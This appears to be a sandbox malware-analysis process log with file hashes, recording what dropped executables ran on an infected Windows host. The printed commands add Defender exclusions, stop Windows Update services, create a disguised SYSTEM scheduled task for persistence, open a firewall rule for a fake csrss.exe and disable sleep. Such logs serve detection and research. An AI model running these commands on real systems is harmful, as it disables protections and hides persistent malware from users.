C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ml67CK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ml67CK.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3944 -ip 3944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,8768364597170410669,7338875174017337451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,1818369280764530869,3444074162818531954,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,2030081554748101501,770802937920981015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,2603108868422151519,3588082286991269282,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,2030081554748101501,770802937920981015,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,488039760645799401,12073486717080831913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,5118401241585366558,13455160645740923347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,488039760645799401,12073486717080831913,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,1818369280764530869,3444074162818531954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,12646720177906114111,12649250219733911196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,5118401241585366558,13455160645740923347,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,2603108868422151519,3588082286991269282,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,12646720177906114111,12649250219733911196,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,8768364597170410669,7338875174017337451,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3636291597979186051,15702591769461271768,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3636291597979186051,15702591769461271768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,17237243772692651098,2981872246627319063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,17237243772692651098,2981872246627319063,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8co344Py.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8co344Py.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9ht5PK8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9ht5PK8.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe b61d0738e9711aff8472b530f28c712b ZyYqiaRnmEW78rJDxU0Mlw.0.1.0.0.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7364 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\B169.exe

C:\Users\Admin\AppData\Local\Temp\B169.exe

C:\Users\Admin\AppData\Local\Temp\B283.exe

C:\Users\Admin\AppData\Local\Temp\B283.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6052 -ip 6052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 784

C:\Users\Admin\AppData\Local\Temp\DA7F.exe

C:\Users\Admin\AppData\Local\Temp\DA7F.exe

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\DF91.exe

C:\Users\Admin\AppData\Local\Temp\DF91.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\DD10.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc [encoded command not preserved in this copy]

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4804 /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\C9A4.exe

C:\Users\Admin\AppData\Local\Temp\C9A4.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

MD5 21dcfc77dd0fa7e37e6cbc91414d0032
SHA1 f6571261d908df9c039032475c8ffd0a20c425b4
SHA256 21fcafb01ee1c93836a0235caa62a778c0815ded2bec7db7c7bcba2a2f55449f
SHA512 49e657efe14a5d75bff0ae3bf1170a9665d859ce7859623e6be03fcd042de728c6d169267a97fe77c4c6703148119a767a744ca88afe16b5f33e44c171165208

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

MD5 21dcfc77dd0fa7e37e6cbc91414d0032
SHA1 f6571261d908df9c039032475c8ffd0a20c425b4
SHA256 21fcafb01ee1c93836a0235caa62a778c0815ded2bec7db7c7bcba2a2f55449f
SHA512 49e657efe14a5d75bff0ae3bf1170a9665d859ce7859623e6be03fcd042de728c6d169267a97fe77c4c6703148119a767a744ca88afe16b5f33e44c171165208

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

MD5 9c92ba2621200fd09f7d42344923306a
SHA1 f53b41f16e33642eb227548e3bf1486d784cce15
SHA256 ebc2cc7b0c8d15b624cee5354dd58063a8ded19a18cb42f228320614b951b9bb
